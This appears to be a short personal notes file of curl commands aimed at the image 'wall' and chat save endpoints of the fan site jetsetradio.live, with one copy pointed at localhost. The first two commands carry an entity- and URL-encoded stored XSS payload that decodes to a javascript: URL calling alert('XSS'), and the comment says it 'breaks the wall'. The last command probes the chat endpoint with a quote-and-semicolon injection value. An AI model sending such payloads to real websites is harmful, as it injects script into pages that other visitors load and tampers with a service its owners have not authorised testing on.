
# THis curl breaks the wall, infinite url encrypt chain
curl -X POST -d 'php_imageLink=%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29&php_imageSize=0.2&php_xPos=0.3998041775456919&php_yPos=0.3225058004640371&php_rotationSetting=0' https://jetsetradio.live/wall/APP/editor/save.php

# same as above just jsonifyed
curl -X POST -d '{"php_imageLink":"%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29","php_imageSize":0.2,"php_xPos":0.40013054830287204,"php_yPos":0.41067285382830626,"php_rotationSetting":0}
' localhost:3000/wall/APP/editor/save.php


curl -X POST -d 'chatmessage="";&username=okok&chatpassword=true' https://jetsetradio.live/chat/save.php

